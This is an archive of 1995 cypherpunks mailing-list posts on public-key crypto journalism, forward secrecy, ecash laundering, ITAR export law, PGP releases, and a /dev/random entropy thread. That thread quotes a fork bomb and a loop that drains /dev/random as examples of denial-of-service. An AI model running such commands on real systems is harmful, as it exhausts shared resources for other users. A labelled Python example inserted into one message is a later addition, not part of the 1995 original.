MIME-Version: 1.0
Content-Type: text/plain


There's a full page equivalent article on encryption in today's San Jose
Mercury News (12E-11E). The article concentrates on public key
cryptography, and mixes some good stuff with some silly mistakes. The
first page has about 4/5th of the article devoted to a big diagram showing
how someone used public key encryption to cover a whole message, and sent
it over the internet to someone in Argentina. All this without a mention
of using symmetric cyphers, and without even mentioning ITAR. 

Another 1/8th of this page is given over to a bunch of cypher text that
supposedly encodes the address of "Mr Cosmic Kumquat, SSl Trusters etc.." 
This address looks kind of familiar... but they seem to imply that the 
cyphertext is the output of an RSA encryption, not RC4. 

They then go on to discuss factoring, and explain the difference between 
the strength of algorithms in theory, and how Netscape became vulnerable 
due to "beginners mistakes" in the implementation, and how security is 
best assured by open disclosure, not security through obscurity. 

Simon
----
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 1 Nov 1995 07:48:45 +0800
To: cypherpunks@toad.com
Subject: Perfect Forward Secrecy - is it worth it?
Message-ID: <Pine.SOL.3.91.951031141506.1151H-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



Quick survey; how important is perfect forward secrecy to you? I've asked 
three people locally so far and gotten four different answers, so in the 
spirit of spreading divisiveness where'er I go, I'll try and get a few 
more opinions here :-) 

In general, schemes offering PFS require an extra PK-op, and an extra 
round-trip when compared to  non-PFS schemes. This cost is incurred once 
per "session", but can add on the order of seconds to startup times. 
Should key-management schemes where PK is available always provide PFS, 
allow PFS, or not provide PFS? The amount of code needed to implement 
each choice point is similar, if you're using something like BSAFE. 

Simon
---
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1)  ((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 1 Nov 1995 05:33:03 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: ecash remailer
In-Reply-To: <199510311703.JAA14785@jobe.shell.portal.com>
Message-ID: <199510311940.OAA31415@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hal writes:
[suggesting a problem with Ed the Currency Cleaner]
> What about this, though: Alice did not mean to pay Bob, but rather
> Charlie, and Bob stole the coins.  He launders them through Ed's
> service.  Charlie never got the cash, and Alice complains to the bank
> that the coins were stolen.  The bank says, fine, we can identify the
> perpetrator, let's see... it's Ed.  Ed is now charged with theft and
> has an expensive and uncertain legal experience ahead of him.

Jumping in hastily:

It seems to me that Ed faces a larger problem if the above scenario turns
out to be a viable attack. Consider the following sequence: Alice and
Charlie decide to get some (payee-anonymous) currency laundromat in hot 
water. Alice (payer-anonymously) washes some coins at the laundromat.
Con-man Charlie claims he didn't get paid for some fictional transaction with
Alice. Alice complains to the bank, and the rest proceeds as before. The
Alice-frames-Ed situation is functionally equivalent to the Bob-robs-Charlie
situation from the bank's perspective.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 31 Oct 1995 22:15:13 +0800
To: cypherpunks@toad.com
Subject: Smart Snoops
Message-ID: <199510311348.OAA13053@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Wall Street Journal, October 30, 1995, p. B3.


Netcom to Use Smart Switches For the Internet

By Audrey Choi


Internet provider Netcom On-Line Communication Services Inc.
said it will use high-speed network switches from Cascade
Communications Corp. in a move to upgrade the speed and
flexibility of its Internet services.

Netcom's decision represents a significant endorsement for
Cascade, a small Westford, Mass.-based company whose revenues
have soared along the rapid growth of the Internet. In
addition to Netcom, Cascade also is supplying switching
devices, which control the flow of information across a
far-flung computer network, to UUNet Technologies Inc. and
Performance Systems International Inc.

To prepare for an expected rise in the number of users,
networking analysts say the Internet needs to move toward a
more efficient architecture based on high-speed intelligent
switches, like Cascade's, which not only allow large volumes
of data to be transmitted quickly, but also offer Internet
service providers the ability to track and manage the data
being transported.

Brad Meinert, senior analyst at research firm Input, says the
tremendous growth of the World Wide Web, a graphics Internet
interface, "is putting increased capacity demands for greater
bandwidth on the Internet infrastructure."

In the past, the Internet depended primarily on simpler
router-based wide-area networks that provided access to users
with dial-up modems and leased lines. Bundles of data moving
over this kind of network is evaluated and processed at each
router until it arrives at its destination -- a tedious
process that can adversely affect time-sensitive applications,
such as video conferencing.

"We've been talking about an information super highway, but
our infrastructure is really just dirt roads," said Daniel E.
Smith, Cascade's president and chief executive. Mr. Meinert
noted that "switching is clearly the next generation, which
allows you to create the virtual network."

Financial details of the Netcom deal weren't disclosed, but
Cascade's Mr. Smith said the deals with the three major
Internet providers initially represents "tens of millions of
dollars" of business. UUNet said it has purchased $6.5 million
worth of Cascade products.

Cascade's switches provide the highest port density and
highest network capacity, analysts say. Its switches range in
cost from $25,000 to $250,000 and enable a far greater number
of users to access the Internet through any one point. While
a typical router may be able to handle 20 to 50 users, a
single Cascade switch can accommodate 1,000 users, says Desh
Deshpande, Cascade's founder and marketing vice president.
Additionally, the management capabilities of the smart
switches enable Internet providers to track how many data
bundles a customer sends, where each bundle is at any point in
time, and what priority on the network they should be given.

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 31 Oct 1995 22:22:07 +0800
To: cypherpunks@toad.com
Subject: Virtual Security Jitters
Message-ID: <199510311351.OAA13151@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Financial Times, October 30, 1995, p. 13.


Online bank era dawns

By Louise Kehoe

The Security First Network Bank established by Cardinal
Bancshares -- a small Kentucky savings and loan institution -- is
the first financial institution to conduct true online banking
over the Internet.

SFNB's pioneering effort may influence the growth of Internet
banking. Larger financial institutions are watching for clues
as to how consumers respond and to see whether the cyberbank
can live up to its "Security First" name.

Concerns about Internet security -- exacerbated by incidents in
which supposedly secure software has proven vulnerable -- have
made banks cautious. SFNB claims to have created a "virtual
vault" for each customer account, using a "trusted" computer
operating system from Hewlett-Packard, the second largest US
computer company, as well as encryption and user
authentification software, and firewalls.

"We have overcome the problem that has prevented banks from
transacting over the Internet," said James Mahan, SFNB's
chairman.

Perhaps cyberbanking's biggest draw is that the SFNB is open
24 hours a day, seven days a week. Customers will be able to
conduct standard personal banking tasks such as paying bills,
transferring funds from one account to another and checking
the balance of an account.

Nor are there queues at the counters in the "virtual lobby" of
the SFNB which are staffed by computer renditions of
R2D2-style robots (http://www.sfnb.com).

But waiting for images to download from the Internet over a
modem may persuade users that a bus trip to their local bank
is not such a bad idea.

SFNB also faces competition from more than 20 US banks
including Chemical Bank, Wells Fargo and First Interstate that
have formed partnerships with Intuit, the leading personal
finance software company, to enable users of the popular
Quicken program to access information from their accounts and
pay bills electronically.

Services offering stock prices, information about mortgages,
loans and retirement funds as well as insurance are
flourishing.

Some of the most innovative include BankAmerica's new Web site
which opened a week ago with an invitation to users to "build
your own bank". By filling in a form, users can tailor the
information presented to fit their interests.

A student, for example, might be presented with information
about obtaining loans for college fees. Someone close to
retirement age would automatically be routed to information
more relevant to his interests.

One of the largest mortgage lenders in the US, Bank of
America, has also chosen to put an emphasis on property
purchases at its Web site.

Hyperlinks to real estate firms throughout the US enable users
to search through lists of homes for sale and then to link
back to the bank in order to apply for financing
(http://www.bankamerica.com).

Among the biggest attractions of the Internet for consumers,
including consumers of financial services, is the ability to
"shop around" so as to compare costs and advantages.

The insurance industry is taking this to heart in a new
service that goes live today. Insweb will enable consumers to
seek quotes from a range of companies and brokers on life,
home, car and medical insurance.

The service, established by a group of 25 insurance companies
and related organisations is the first "marketplace" on the
Internet for insurance information and commerce.

Insweb plans to enable users to purchase insurance online. In
a pilot program next month, residents of the state of Utah
will be able to buy car insurance via the Internet
(http://www.insweb.com).

-----

Internet Law Review is a monthly paid-for publication available
electronically or on hard copy from December. Among other
issues, it will cover IT-law and the Internet; commercial
security and encryption, using contributors from North America
and Europe. Subscription is $220 a year and details are
available from <www.thinck.com/publications.html>. Meanwhile,
details of this week's Internet Law Symposium in Seattle are
available at <www.discovery.org/ils95>.

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Theodore Ts'o" <tytso@MIT.EDU>
Date: Wed, 1 Nov 1995 05:48:18 +0800
To: Mark Murray <mark@grondar.za>
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <199510311715.TAA05821@grumble.grondar.za>
Message-ID: <9510312008.AA27100@dcl.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Tue, 31 Oct 1995 19:15:35 +0200
   From: Mark Murray <mark@grondar.za>

   >    Is this millisecond accuracy quantifiable in terms of bits of entropy?
   >    if so, the ethernet is surely safe?
   > 
   > Well, no.  If you're only using as your timing the 100Hz clock, the
   > adversary will have a better timebase than you do.  So you may be adding
   > zero or even no bits of entropy which can't be deduced by the adversary.

   In a 386 or a 486 (under FreeBSD at least) there is a 1Mhz clock available.
   How would _this_ be? On the Pentium there is the <whatsit?> register
   which will give the board's oscillator (or 90 MHz) I believe.

What's HZ set at for FreeBSD?  Most of the x86 Unixes have generally
used HZ set at 100, because the interrupt overhead on a x86 isn't cheap,
and so you want to limit the number of clock interrupts.

You can sample the timing clock, but it turns out to be rather expensive
to do so; several I/O instructions, which will require several delays if
they have to go through your 8 MHz ISA bus.  We've moved away from using
the hardware clock on the 386 because of the overhead concerns.  On the
Pentium, we use the clock cycle counter.

   What then is a body to do? Preserve all _verifiable_ randomness like gold?
   Dish it out under some quota? A denial of service attack would be

Well, verifiable randomness really is like gold.  It's a valuable
resource.  On a time-sharing system, where you really want to equitably
share *all* system resources perhaps there should be a quota system
limiting the rate from which a user is allowed to "consume" randomness.

On the other hand, most Unix systems *aren't* great at doing this sort
of resource allocation, and there are enough other ways of launching
denial of service attacks.  "while (1) fork();" will generally bring
most systems to their knees, even in spite of limitations of the number
of processes per user.  Most Unix systems don't protect against one user
grabbing all available virtual memory.  And so on....

   forever {
	   cat /dev/random > /dev/null
   }

   Severely limiting most decent folk's chance at getting PGP to work.

If you have such a "bad user" on your system, and the PGP /dev/random
code is written correctly, it will only be a denial of service attack.
But it'll be possible to identify who the bad user is on your system,
and that person can then be dealt with, just as you would deal with some
user that used up all of the virtual memory on the system trying to
invert a 24x24 matrix, or some such ---- in both scenarios, the ability
for another user to run PGP is severely limited.  

There's nothing special about /dev/random in this sense; it's just
another system resource which can be abused by a malicious user, just
like virtual memory or process table slots.

   > So I like to be conservative and use limits which are imposed by the
   > laws of physics, as opposed to the current level of technology.  Hence,
   > if the packet arrival time can be observed by an outsider, you are at
   > real risk in using the network interrupts as a source of entropy.
   > Perhaps it requires building a very complicated model of how your Unix
   > scheduler works, and how much time it takes to process network packets,
   > etc.  ---- but I have to assume that an adversary can very precisely
   > model that, if they were to work hard enough at it.

   This is a strong argument for some form of specialised noise source.
   I have read of methods of getting this from turbulent air flow in a hard
   drive (an RFC, I believe).

Yes, ultimately what you need is a good hardware number generator.
There are many good choices; from radioactive decay, noise diodes, etc.

I'm not entirely comfortable with the proposal of using air flow
turbulence from a hard drive, myself, because the person who suggested
this still hasn't come up with a decent physical model which tells us
how many bits of true entropy this system really provides.  What Don
Davis did was to develop more and more sophisticated models, and
demonstrated that his more sophisticated models weren't able to explain
the "randomness" that he observed in the time that it took to complete
certain disk requests.  However, that doesn't prove that the
"randomness" is really there; it's just that he couldn't explain it
away.  It might be that the NSA has a much better model than Don Davis
was able to come up with, for example, and the amount of randomness from
air turbulence really is a lot less than one might expect at first
glance.

Short of good hardware sources, the other really good choice is
unobservable inputs.  Hence, the Linux driver is hooked into the
keyboard driver, and the various busmice drivers.  Those are really
wonderful sources of randomness, since they're generally not observable
by an adversary, and humans tend to be inherently random.  :-)

						- Ted
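
[Added example, not part of the original message and not code from the
Linux or FreeBSD drivers.  It puts numbers on the point above about the
100 Hz clock: if an outsider can place a packet's arrival within some
window, only the timestamp values that still fit inside that window are
unknown to them.  The uniform-window model, the +/-5 us default and all
function names are assumptions of this sketch; the clock rates are the
ones named in the thread.]

```python
import math
import random

PS_PER_SECOND = 10**12  # work in integer picoseconds to avoid float rounding

# Clock rates mentioned in the thread, expressed as tick lengths.
CLOCKS = {
    "100 Hz scheduler tick": PS_PER_SECOND // 100,
    "1 MHz timer": PS_PER_SECOND // 1_000_000,
    "90 MHz cycle counter": 11_111,  # rounded period, good enough to compare
}


def timestamp_distribution(observed_ps, uncertainty_ps, tick_ps):
    """Probability of each host timestamp, given what the observer saw.

    Assumed model: the true interrupt time is uniform on
    [observed - uncertainty, observed + uncertainty) and the host records
    floor(time / tick).  Returns {tick_value: probability}.
    """
    lo = observed_ps - uncertainty_ps
    hi = observed_ps + uncertainty_ps  # exclusive upper bound
    dist = {}
    for k in range(lo // tick_ps, (hi - 1) // tick_ps + 1):
        # Part of the observer's window that falls inside tick k.
        overlap = min(hi, (k + 1) * tick_ps) - max(lo, k * tick_ps)
        dist[k] = overlap / (hi - lo)
    return dist


def min_entropy_bits(dist):
    """Bits an observer cannot guess: log2(1 / probability of best guess)."""
    return math.log2(1 / max(dist.values()))


def shannon_bits(dist):
    """Shannon entropy of the same distribution, for comparison."""
    return -sum(p * math.log2(p) for p in dist.values() if p > 0)


def constructed_arrivals(count, seed=1995):
    """Constructed sample data: packet arrival times within one second."""
    rng = random.Random(seed)
    return [rng.randrange(PS_PER_SECOND) for _ in range(count)]


def average_hidden_bits(arrivals, uncertainty_ps, tick_ps):
    """Mean min-entropy per timestamp over a list of observed arrivals."""
    total = sum(
        min_entropy_bits(timestamp_distribution(t, uncertainty_ps, tick_ps))
        for t in arrivals
    )
    return total / len(arrivals)


if __name__ == "__main__":
    arrivals = constructed_arrivals(300)
    for window_us in (1, 5, 50):  # observer's uncertainty, +/- microseconds
        print(f"observer uncertainty +/-{window_us} us")
        for name, tick_ps in CLOCKS.items():
            bits = average_hidden_bits(arrivals, window_us * 10**6, tick_ps)
            print(f"  {name:24s} {bits:6.2f} bits/sample hidden")
```

[A coarse clock leaves almost nothing hidden because the observer's
window nearly always fits inside a single tick; a finer clock only helps
up to the width of that window, which is set by the observer, not by you.]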





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 1 Nov 1995 08:02:46 +0800
To: djw@pdcorp.com
Subject: Re: CJR returned to sender
In-Reply-To: <199510280045.RAA10830@email.pdcorp.com>
Message-ID: <199510312113.QAA16575@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Dan Weinstein writes:
>>If anyone from MIT is reading this, it would be a real public service to 
>>put on a web site (a) what the system used for the release of PGP is 
>>exactly and (b) what assurances (oral, written, names & dates) was 
>>received from State/Commerce that this was legal.
>
>You are assuming that because the government has chosen not to
>prosecute MIT that they will not prosecute anyone else.  This is a
>faulty assumption, laws are not invalidated if they are not enforced,
>only if they are repealed or overturned.

IANAL, but this seems implausible.  If MIT has received assurances
(written or oral) from the DoJ that indicate that their scheme is
adequate, then another organization prosecuted while following an
identical scheme can admit this as evidence.

There isn't, to my knowledge, a specific law which defines the act of
export over the 'net.  The DoJ, in effect, determines the definition by
their actions.  Failure to prosecute MIT should lead a responsible
judge to dismiss actions against a subsequent defendant that follows
the same practice.

I agree that things would be different in cases like traffic laws:  the
fact that millions of people exceed legal speed limits every day
doesn't make speeding laws invalid, but this is a matter where there is
no question whether the act broke the law.  Where the line is drawn by
the legislature, failure of the executive does not invalidate the law
--- it merely tarnishes the reputation of the executive.  Where the
line is drawn by the executive, failure to prosecute moves the line,
IMHO.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 1 Nov 1995 05:22:00 +0800
To: hallam@w3.org
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
Message-ID: <9510312013.AA12543@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> Isn't this what the GSS-API is about?  Couldn't HTTP-NG just convey GSS
> "tokens", and do something about getting both sides to agree on which GSS
> "mechanism" is to be used, and on what Principals are involved?

Yes, exactly.  Of course negotiation and naming are often the harder
issues.  It is a pity that HTTP-NG seems to be inventing protocol-specific
crypto-systems, rather than designing a general one and then being its
first customer.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 1 Nov 1995 05:45:06 +0800
To: cypherpunks@toad.com
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <199510312331.SAA03949@jekyll.piermont.com>
Message-ID: <9510312015.AA00768@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>A keyed version of MD5 is the base authentication mechanism in IPSP
>and it has been heavily examined by a number of very good
>cryptographers.

Yes we reviewed it and said that it sucked.

Phil wrote a note to Ron and Ron sent in a series of comments. I suggested that
the idea of a keyed digest be stated as a separate concept from a hash function.
Functions of one variable are intrinsically different from functions of two 
variables.

The sequence of events I heard was that they asked Burt Kaliski for a suggestion,
he gave them one and they chose something different.

	
>Isn't this what the GSS-API is about?  Couldn't HTTP-NG just convey GSS
>"tokens", and do something about getting both sides to agree on which GSS
>"mechanism" is to be used, and on what Principals are involved?

GSS is often brought up on occasions like this. I have never seen an architectural
overview of what it is trying to achieve for me or how. When I am provided 
with a clear definition of what it is I hope to arrive at a clear explanation 
of why I'm not using it. Unfortunately the RFC process strips the rationale
part out of the specs. 


		Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Wed, 1 Nov 1995 07:47:59 +0800
To: Jim Castleberry <jcastle@in-system.com>
Subject: Re: PGP 2.6.2 signator replacement bug fix
In-Reply-To: <9510311803.AA11158@toad.com>
Message-ID: <199510312113.QAA01220@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


PGP 2.6.2 is not going to be re-released.  I have been working on a
PGP 2.6.3 release, but I must admit that I haven't had as much time as
I would like to work on it.

Before 2.6.3 is released, all of the reported bugs (which are
currently archived and marked as fixed when the bug is fixed) will be
hand-checked.  Unfortunately I just have not had the time to work on
this, due to other obligations.  Hopefully I will have more time this
winter.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Patterson <lep@tanju.wsnet.com>
Date: Wed, 1 Nov 1995 07:22:42 +0800
To: cypherpunks@toad.com
Subject: Re: Need Mail-to-News gates
In-Reply-To: <Pine.LNX.3.91.951027175407.19464A-100000@tanju.wsnet.com>
Message-ID: <Pine.LNX.3.91.951031155712.7755A-100000@tanju.wsnet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Oct 1995, Alan Patterson wrote:

> > Could someone PLEASE netmail me some _known reliable_ gates that use the
> > straight netmail address format (alt.whatnot@bosco.kollege.edu)?
> 
> If someone will direct me to sources, I'll try and setup a gate. (We use 
> INN).

I've gotten the gate up, but still working a few bugs out. Cypherpunks 
are welcome to use it but if it is abused, I will have to remove general 
access.

Until I can write a script to pull all the newsgroups from the active 
file and place aliases for them in sendmail, the only way to use it is 
via a Newsgroups: header. The address is mail2news@news.wsnet.com.

Let me know any bugs you may find.

Alan Patterson (lep@wsnet.com)        Fngpt: 41D0F61B496FECC09FABECF686AB2A1C
WSNetwork Communications Services, Inc.         PGP Encrypted Email Preferred
Montgomery, Alabama (334) 263-5505 (800) INET-750  Public Key @ MIT keyserver






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 1 Nov 1995 09:13:58 +0800
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
In-Reply-To: <199510312113.QAA16575@universe.digex.net>
Message-ID: <199511010030.QAA09462@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Scott Brickner <sjb@universe.digex.net> writes:
>Dan Weinstein writes:
[unknown writes:]
>>>If anyone from MIT is reading this, it would be a real public service to 
>>>put on a web site (a) what the system used for the release of PGP is 
>>>exactly and (b) what assurances (oral, written, names & dates) was 
>>>received from State/Commerce that this was legal.
>>
>>You are assuming that because the government has chosen not to
>>prosecute MIT that they will not prosecute anyone else.  This is a
>>faulty assumption, laws are not invalidated if they are not enforced,
>>only if they are repealed or overturned.

>IANAL, but this seems implausible.  If MIT has received assurances
>(written or oral) from the DoJ that indicate that their scheme is
>adequate, then another organization prosecuted while following an
>identical scheme can admit this as evidence.

>There isn't, to my knowledge, a specific law which defines the act of
>export over the 'net.  The DoJ, in effect, determines the definition by
>their actions.  Failure to prosecute MIT should lead a responsible
>judge to dismiss actions against a subsequent defendant that follows
>the same practice.

It is also worth noting that the ITAR violation is worded somewhat
differently from some laws, requiring "willful" violation, a "specific
intent" to break the law.  In this situation, good faith efforts to comply
with what the law appears to be would seem to me to be a strong defense.
See <URL:http://www.portal.com/~hfinney/cryp_export1.html> for a writeup
I did on this a couple of years ago.  An excerpt, from U.S. v
Lizarraga-Lizarraga (541 F2d 826):

"Accordingly, we hold that in order for a defendant to be found guilty of
exporting under 22 U.S.C. 1934, the government must prove that the
defendant voluntarily and intentionally violated a known legal duty not
to export the proscribed articles, and the jury should be so instructed."

I am not a lawyer, however.  It would be interesting to hear what our
legal exports think of this argument.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 1 Nov 1995 07:23:41 +0800
To: cypherpunks@toad.com
Subject: A final Huber-Spam: ON MONEY
Message-ID: <v02120d00acbc472b58a4@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Note the URL.

There's more there for them as wants 'em.

Cheers,
Bob Hettinga


--- begin forwarded text

Date: Tue, 31 Oct 95 21:32:44 0500
From: Robert Hettinga <rah@shipwright.com>
Organization: Shipwright
MIME-Version: 1.0
To: rah@shipwright.com
Subject: 031692.html
X-URL: http://khht.com/huber/forbes/031692.html

http://khht.com/huber/forbes/031692.html
> ON MONEY
>
> by Peter Huber
>
> Forbes, March 16, 1992 at Pg. 144
>
> Copyright 1992 by Peter Huber. Electronic copies of this document
> may be distributed freely, provided that this notice accompanies all
> copies.
>
> -------
>
> While Europe strains to give birth to a new currency, Boris Yeltsin
> toils to resurrect a dead one. With private markets triumphant
> everywhere else, however, the mystery is why governments still have
> to manufacture money at all.
>
> It is still often taken for granted that the one thing private
> markets cannot make is money itself: Only government can do that.
> But new governments of young nations, especially nations with
> turbulent histories, can't make money, either. Nobody quite trusts
> them, and without trust the paper lovingly engraved at the
> government mint is valueless.
>
> Until recently, people put up with a lot of government paper because
> even bad paper was more convenient than the alternative, which was
> barter. Every self-respecting capitalist knew that government paper
> was a perishable good, that it always decayed, slowly in
> Switzerland, fast in Brazil, and most just put up with it. But if
> capitalists can produce candies that melt in your mouth, not in your
> hand, why not currencies, too?
>
> Money, as I wrote here two years ago (FORBES, May 14, 1990), is just
> another network, our oldest medium of systematic communication. And
> new communications technologies are fast surpassing the old. The
> paperless bank, unlike the paperless office, is at hand.
>
> When it works, the old-fashioned paper we call money reliably
> records past effort and promises future return. It's all a matter of
> communication among stable communities of productive people. This is
> why individuals can issue currencies, too -- personal checks, IOUs,
> that sort of thing. Once it's established of an individual that her
> word is her bond, she can in fact issue private currency at will, at
> least among people who know her.
>
> But the trouble with private currencies has always been their
> informational overhead. Personal checks bounce, the "I" behind the
> IOU absconds to Monaco, Macy's defaults on its bonds. Private paper
> is also volatile; pegging current value requires specialized
> information from Wall Street, or a bank in Oshkosh, or a trading pit
> in Chicago. In the past, it's often been cheaper to put up with the
> steady but modest thievery of a central bank, which peels off 3%
> (will it soon be 6%?) of your dollar every year through inflation,
> than to sort out whose private paper is worth what at any given
> moment.
>
> Computers and fiber-optic communications are changing all that. Our
> new central bankers can be concerns like TRW and Dun & Bradstreet,
> which track who's solvent and who's a deadbeat and convey the
> information instantly, at the touch of a button, wherever it's
> needed. Our new mints and engravers can be companies like Visa and
> AT&T, which clear millions of transactions daily, both here and
> abroad.
>
> What enterprises like these supply are the informational ingredients
> of money. They already are far better than Alan Greenspan at
> stabilizing value by assembling baskets of private paper as varied
> and diversified as the global economy. Information about who earned
> a credit yesterday or who can be trusted to pay back a debt tomorrow
> can be passed around as easily as a dollar bill. More easily, in
> fact.
>
> Like religious liturgies conducted in some otherwise dead language,
> transactions may still be denoted in dollars or yen, but these
> vestiges of an earlier age will ultimately give way to a new
> financial vernacular. If everybody paid for everything (wages
> included) by credit card, for example, the accounts could just as
> well be denoted in pork bellies, IBM stock, quarterpounders with
> cheese, or (more likely) some very large basket of hundreds of
> different private goods and services, tangible and intangible.
>
> The Lynch, for example, might be a share in a standard pool of
> commodity receipts maintained by Merrill Lynch. Nobody would fully
> trust the Lynch, of course, even if backed by 100% reserves, but
> nobody would have to. Nobody trusts his food supply to any one
> farmer, either. You diversify, you assemble baskets of baskets, and
> you constantly search for quality goods and reliable supply. Same
> with money. When the network and the computers behind it are
> powerful enough, no central authority can or should supply the
> currency, and no one will pay annual tribute by way of inflation to
> the government mint. And with private money, private fortunes will
> no longer be held hostage to public ineptitude in the Kremlin or on
> Capitol Hill.
>
> So back to Yeltsin and how we can help him. Despite the corrupting
> influences of the regulatory collectivist on our own shore,
> America's phone companies and banks are still the best in the world.
> Yeltsin needs them, far more than he needs the International
> Monetary Fund, Pizza Hut or Western investment in Russia's oil
> industry. Modern telefinancial enterprises can deliver the real oil
> of the economy: truly stable media of exchange.
>
> The biggest contribution Yeltsin can make to Russia's fiscal policy
> is to make way for currency capitalists. No exchange controls, no
> bank insurance, no loan guarantees, no criminal prosecution for
> ordinary bankruptcy, nothing but basic, narrowly interpreted laws
> against outright fraud.
>
> Will the new private banks sometimes fail? Of course they will. Will
> widows then be ruined? Certainly. So what else is new? In Russia
> today the only bank in town has failed miserably, and the one cold
> comfort for widows is that the ruin is universal. Give it a try,
> Boris. You have nothing to lose but your rubles.

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 1 Nov 1995 07:25:54 +0800
To: koontz@maspar.com (David G. Koontz)
Subject: Re: InfoWar
In-Reply-To: <9510311924.AA09550@argosy.MasPar.COM>
Message-ID: <199510312244.RAA19266@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


David G. Koontz writes:
> 
>>Industry representatives played down the privacy loopholes.
>>Ronald Plesser, a Washington attorney who represents online
>>services and direct marketing firms, said, "I know of no
>>example of anybody trafficking in e-mail descriptions." A
>>spokeswoman for Hughes Electronics Corp.'s DirecTV said, "We
>>do not release names of customers that ordered movies.
> 
>The name of the customer of a video tape rental may be disclosed
>only under narrow constraints (USC 18 Chap 121 2710):

Didn't you read the post?  The whole point was that the constraints
*don't* cover many *new* technologies.  Sure, your local video store
can't release the data, but your *cable* company is under no such
constraint with regard to pay-per-view.  Ditto with Hughes DirecTV.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 1 Nov 1995 07:37:18 +0800
To: Mark Murray <mark@grondar.za>
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <199510311715.TAA05821@grumble.grondar.za>
Message-ID: <199510312247.RAA19315@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Mark Murray writes:
>Can they predict thermal noise in a cheap transistor? ]:->

As Perry pointed out in the last round on hardware noise generators, they
may not be able to predict it, but they *may* be able to generate a field
which will *influence* it.

It's difficult to know for sure if your noise source is really random,
and to what degree.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Lull <lull@acm.org>
Date: Wed, 1 Nov 1995 02:22:27 +0800
To: hallam@w3.org
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <9510310427.AA28252@zorch.w3.org>
Message-ID: <199510311650.IAA09144@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Oct 1995 23:27:36 -0500, you wrote:

> Hash functions		MD5, SHA

I presume you mean SHA-1.

I would prefer to see MD5 deleted.  A 128 bit hash simply seems too
marginal in length for long term use in most hash applications.  I
would much rather see something like Haval as a second hash algorithm.
It can be faster than MD5, and can easily be tailored to the hash
width you want.  If 128 bit hashes are really needed, use Haval's
128-bit option.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Martin Diehl" <mdiehl@dttus.com>
Date: Wed, 1 Nov 1995 07:37:22 +0800
To: cypherpunks@toad.com
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
Message-ID: <9509318151.AA815185987@cc2.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     Theodore Ts'o writes...
     >Yes, ultimately what you need is a good hardware number generator.
     ...
     >I'm not entirely comfortable with the proposal of using air flow 
     >turbulance [sic] from a hard drive
     ...
     
     Two important observations about the use of a disk drive to get 
     randomness:
     
     1. In the case of some workstations, the local network provides the 
     disk drive and there isn't a local hard drive at all.  Hence, any 
     timing of disk accesses will give you data that is influenced by the 
